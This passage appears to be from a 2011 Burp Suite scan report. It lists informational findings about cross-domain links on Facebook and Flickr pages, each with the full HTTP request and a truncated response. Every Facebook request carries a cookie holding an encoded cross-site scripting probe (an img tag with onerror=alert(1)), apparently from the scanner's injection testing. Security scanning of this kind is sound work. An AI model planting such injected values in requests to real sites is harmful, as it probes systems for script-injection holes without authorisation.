  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/Ju8IBHuS1Zr.css

Request

GET /plugins/send.php?api_key=187288694643718&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfca7ad0b8%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=lucida+grande&href=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&locale=en_US&sdk=joey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.49
Connection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 7413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/Ju8IBHuS1Zr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.73. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/r.php?locale=en_US
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/6iHeF4N1jZz.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css

Request

GET /r.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
Connection: close
Date: Thu, 05 May 2011 11:43:09 GMT
Content-Length: 29499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/6iHeF4N1jZz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
</a><img class="standard_status_element img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="Loading..." id="captcha_throbber" width="16" height="11" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

16.74. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
The response contains the following links to other domains:
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/195657_100000824820783_404836_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/oaBzoE1JD-P.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

GET /r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Bucky-Jordan/100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.27
X-Cnection: close
Date: Thu, 05 May 2011 11:43:18 GMT
Content-Length: 29953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/oaBzoE1JD-P.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIContentTopper clearfix" id="UIContentTopper" title="Sign up for Facebook to become Bucky Jordan&#039;s Friend"><img src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195657_100000824820783_404836_q.jpg" class="UIContentTopper_thumbnail" /><div class="UIContentTopper_text_container">
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

16.75. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/share.php?u=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /share.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.148.69
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 10425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

16.76. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/sharer.php?u={{url}}&t={{title}}
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /sharer.php?u={{url}}&t={{title}} HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B%257Burl%257D%257D%26t%3D%257B%257Btitle%257D%257D; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.148.73
Connection: close
Date: Thu, 05 May 2011 11:40:17 GMT
Content-Length: 10565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

16.77. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/terms.php?ref=pf
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.65
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 44099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.78. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/terms.php?ref=pf
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; wd=1022x1007; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.182.35
X-Cnection: close
Date: Thu, 05 May 2011 11:44:18 GMT
Content-Length: 43663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.79. http://www.flickr.com/badge_code_v2.gne

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00
The response contains the following link to another domain:
  • http://geo.yahoo.com/p?s=792600102&t=72fb4c3d82e1e2b081ceab63fe7a239c&r=http%3A%2F%2Fwww.tuaw.com%2Fhub%2Fapp-reviews&fl_ev=0&lang=en&intl=us

Request

GET /badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/hub/app-reviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
